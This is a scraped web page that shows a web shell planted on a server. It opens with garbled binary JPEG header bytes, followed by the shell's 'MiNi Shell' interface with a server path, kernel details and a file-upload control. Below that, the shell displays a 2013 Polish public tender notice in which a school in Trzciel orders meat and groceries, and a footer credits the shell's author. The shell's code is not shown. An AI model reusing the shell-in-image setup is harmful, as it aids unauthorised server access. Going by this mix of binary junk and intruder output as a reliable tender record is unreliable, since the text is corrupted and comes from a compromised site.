JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130205/47580-N-2013.html

<p class="kh_header"><b>Trzciel: Dostawa żywności dla Zespołu Edukacyjnego w Trzcielu</b><br>
<b>Numer ogłoszenia: 47580 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Edukacyjny , ul. Kościuszki 21, 66-320 Trzciel, woj. lubuskie, tel. 95 74 31 218, faks 95 74 31 218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sptrzciel.szkolnastrona.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.sptrzciel.szkolnastrona.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla Zespołu Edukacyjnego w Trzcielu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa żywności dla Zespołu Edukacyjnego w Trzcielu 
Zadanie 1 - Dostawa mięsa i jego przetworów załącznik SIWZ 1.1
1.	Mięso wieprz. łopatka b-k	kg	3
2.	Mięso wieprz. łopatka z kością I klasa	kg	1087
3.	Mięso wieprz. karkówka b-k	kg	538
4.	Mięso wieprz. schab b-k	kg	285
5.	Mięso wieprz. schab z kością	kg	361
6.	Mięso wieprz. żeberka	kg	31
7.	Mięso wieprz. mielone	kg	57
8.	Boczek wędzony parzony	kg	19
9.	Boczek świeży bez skóry	kg	151
10.	Kiełbasa alpejska	kg	6
11.	Kiełbasa biała	kg	21
12.	Kiełbasa żywiecka	kg	7
13.	Kiełbasa szynkowa	kg	2
14.	Kiełbasa śląska	kg	267
15.	Kiełbasa szynkowa z indyka	kg	4
16.	Kiełbasa krakowska sucha	kg	2
17.	Kiełbasa - parówki cienkie	kg	38
18.	Kiełbasa - parówki grube	kg	90
19.	Kiełbasa polska	kg	3
20.	Pasztetowa drobiowa	kg	9
21.	Polędwica sopocka	kg	37
22.	Szynka wieprz. gotowana	kg	9
23.	Słonina bez skóry	kg	348
24.	Kości wieprz. od schabu	kg	450
25.	Polędwica z pieca	kg	5
26.	Mięso drob. - filet z kurczaka	kg	554
27.	Mięso drob. - udko z kurczaka	kg	436
28.	Mięso drob. - pałka z kurczaka	kg	76
29.	Porcja rosołowa z kurczaka	kg	134
30.	Wątróbka drobiowa	kg	28
Zadanie 2 - Dostawa produktów ogólnospożywczych- załącznik SIWZ 1.2
1.	Bazylia 200g op. PET	szt	3
2.	Barszcz czerwony torebka 60g typu Winiary, Knorr	szt	60
3.	Barszcz czerwony koncentrat butelka 330 ml typu Jamar	szt	38
4.	Batonik typu Milky way 23,5g	szt	770
5.	Batonik  typu Pawełek 45g	szt	192
7.	Bułka tarta 400g	szt	190
8.	Chrzan 200 g - 90% skład: chrzan, cukier, ocet spirytusowy, sól, kwas cytrynowy typu Victus	szt	60
9.	Ciepłe lody Murzynek Bambo op.40 szt	op	2
10.	Crispy apples chrupiące plasterki jabłka 20g	szt	452
11.	Cukierki czekoladowe  mieszanka typu Wedel Goplana	kg	5
12.	Cukier kryształ	kg	510
13.	Cukier puder 	kg	2
14.	Cukier wanilinowy 16 g typu Dr Oetker,Delecta	szt	220
15.	Czekolada mleczna100 g typu Goplana	szt	120
16.	Czekoladowy baton typu Mikołaj	szt	110
17.	Czekolada mleczna z orzechami 100g typu Goplana	szt	216
18.	Czekoladowo zbożowy baton z mleczną polewą  25g	szt	200
19.	Dżem wysokosłodzony truskawkowy 300 g typu Międzychód	szt	129
20.	Dżem wysokosłodzony wiśniowy 300 g typu Międzychód	szt	48
21.	Dżem wysokosłodzony brzoskwiniowy 280g typu Łowicz	szt	4
22.	Dżem wysokosłodzony z czarnej porzeczki 300g typu Międzychód	szt	75          
23.	Drożdże piekarskie świeże 100g	szt	75                                                                                                          
24.	Fasola Jaś 400g typu Kros	szt	157
25.	Galaretka w proszku 79 g typu Winiary	szt	44
26.	Groch łuskany połówki 400g typu Kros	szt	77
27.	Groszek konserwowy 400g puszka typu Bonduelle	szt	47
28.	Herbata ekspresowa 100g 50 torebek typu Lipton	szt	20
29.	Herbata ekspresowa miętowa 50g 25 torebek typu Malwa	szt	22
30.	Herbata ekspresowa owocowa 60g 30 torebek typu Malwa	szt	17
31.	Herbatniki Be-be 16g typu Jutrzenka	szt	518
32.	Kukurydza konserwowa 340g typu Bonduelle
	szt	176
33.	Kakao niskotłuszczowe (10-12%  tł.) 80 g typu Decomoreno	szt	30
34.	Krem czekoladowo-orzechowy 630g typu Nutella	szt	7                                                                                                             
35.	Kawa Inka 150 g rozpuszczalna kawa zbożowa	szt	65
36.	Ketchup  450 g łagodny, pikantny bez konserwantów 	szt	48
37.	Koncentrat pomidorowy 30% bez konserwantów 200g typu Pudliszki Międzychód	szt	240
38.	Koncentrat pomidorowy 30% bez konserwantów 900g typu Pudliszki Międzychód	szt	103
39.	Kisiel na 0,5 l wody 60g typu Winiary	szt	66
40.	Kasza jęczmienna wiejska średnia 	kg	151
41.	Kasza manna	kg	5
42.	Liść laurowy 150 g op. karton	szt	1
43.	Majeranek 10 g typu Appetita	szt	30
44.	Majeranek 160g op PET	szt	20
45.	Majonez 400 g typu Winiary	szt	89
46.	Mąka pszenna luksusowa typu Kostrzyn	kg	370
47.	Mąka pszenna tortowa typu Kostrzyn	kg	103
48.	Mąka pszenna wrocławska typu Kostrzyn	kg	159
49.	Mąka ziemniaczana 	kg	19
50.	Makaron gwiazdki 100% semoliny pszenicy durum	kg	20
51.	Makaron spaghetti 100% semoliny pszenicy durum	kg	82
52.	Makaron nitki 100% semoliny pszenicy durum	kg	35
53.	Makaron świderki 100% semoliny pszenicy durum	kg	120
54.	Makaron kokardki małe 100% semoliny pszenicy durum	kg	150
55.	Makaron kolanka duże, małe 100% semoliny pszenicy durum	kg	100
56.	Makaron rurki 100% semoliny pszenicy durum	kg	20
57.	Makaron łazanka 100% semoliny pszenicy durum	kg	25
58.	Makron muszle małe, duże 100% semoliny pszenicy durum	 kg	15
59.	Makaron zacierka 2 jajeczny 250g	Szt	30
60.	Margaryna do pieczenia 72% tłuszczu 250 g typu Kasia	Szt	497
61.	Miód wielokwiatowy  400 g	Szt	9
62.	Musztarda stołowa 200 g skład: woda, gorczyca, cukier, ocet	szt	16
63.	Napój typu Tymbark 250 ml różne smaki	szt	648                                                                                                                                          
64.	Ocet  spirytusowy 0,5 l	szt	61
65.	Ogórek konserwowy słoik 880g typu Ptak	szt	178
66.	Olej kujawski 1 l 	szt	329
67.	Oregano 200g op PET	szt	3
68.	Papryka konserwowa 900g typu Ptak	szt	16
69.	Papryka mielona słodka 20g typu Appetita	szt	126
70.	Pasztet drobiowy 160g typu Prochowicki	szt	120
71.	Pieprz czarny mielony 20 g typy Appetita	szt	425
72.	Petitki Lubisie 30g różne smaki	szt	168
73.	Płatki kukurydziane + 7 witamin 250g typu Nestle Corn Flakes	szt	173
74.	Płatki zbożowe z miodem + 8 witamin 225g typu Nestle Cheerios	szt	11
75.	Płatki zbożowe z cynamonem 225g typu Nestle Cini Mins	szt	25
76.	Płatki czekoladowe muszelki z ziarna pszenicy 225g typu Nestle Chocapic	szt	68
77.	Płatki owsiane 500g typu Górskie	szt	4
78.	Przyprawa w płynie do zup 1l typu Winiary, Knorr	szt	65
79.	Przyprawa fix do sosu bolońskiego 46g typu Winiary	szt	35
80.	Przyprawa do kurczaka 30g typu Appetita	szt	15
81.	Przyprawa do gyrosa 30g typu Appetita	szt	6
82.	Powidła śliwkowe 300 g typu Międzychód  Urbanek	szt	59
83.	Prince Polo 58g	szt	406
84.	Princessa 35g	szt	228
85.	Pyzy drożdżowe op10 szt - 440 g	szt	145
86.	Rogal 7 days 60g	szt	144
87.	Rosół drobiowy w kostkach - 1 op. = 6 szt 60 g typu Winiary	op	223
88.	Ryż biały typu Sonko	kg	160
89.	Ryż paraboliczny	kg	166
90.	Sałatka warzywna w słoiku 890 g typu Ptak	szt	3
91.	Syrop różne smaki 440 ml typu Łowicz	szt	878
92.	Sok Kubuś 0,3l różne smaki	szt	580
93.	Sok Leon 0,2l różne smaki	szt	270
94.	Sok Cymes 0,2l różne smaki	szt	1099
95.	Sok Life 250 ml różne smaki	szt	720
96.	Sok Frugo 250 ml różne smaki	szt	96
97.	Sok pomarańczowy 1l typu Tymbark	szt	24
98.	Szczaw konserwowy 320g skład: krojone liście szczawiu, sól typu Edmal	szt	60
99.	Sos sałatkowy 1,2kg ogrodowy, włoski, ziołowy szt	3
100.	Sos sojowy 150ml	szt	5
101.	Sól drobna	kg	217
102.	Wafle śmietankowe	kg	21
103.	Wegeta 75g	szt	1490
104.	Woda Żywiec 0,5l niegazowana smaki	szt	132
105.	Ziele angielskie 500g op PET	szt	1
106.	Ziarenka smaku 75g typu Winiary	szt	6
107.	Żurek w proszku 49g typu Winiary	szt	255                                                                                                                                                                                                        
108.	Zioła prowansalskie 250g op PET	szt	3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.30.00.00-1, 15.10.00.00-9, 15.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego powyżej nie jest wymagane przedstawienie dokumentów i oświadczeń w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego powyżej nie jest wymagane przedstawienie dokumentów i oświadczeń w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jeżeli wykonawca, polega na zdolnościach finansowych innych podmiotów wymaga się przedłożenia informacji, dotyczącej tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sptrzciel.szkolnastrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Edukacyjny w Trzcielu, ul. Kościuszki 21, 66-320 Trzciel.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 10:00, miejsce: Zespół Edukacyjny w Trzcielu, ul. Kościuszki 21, 66-320 Trzciel
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com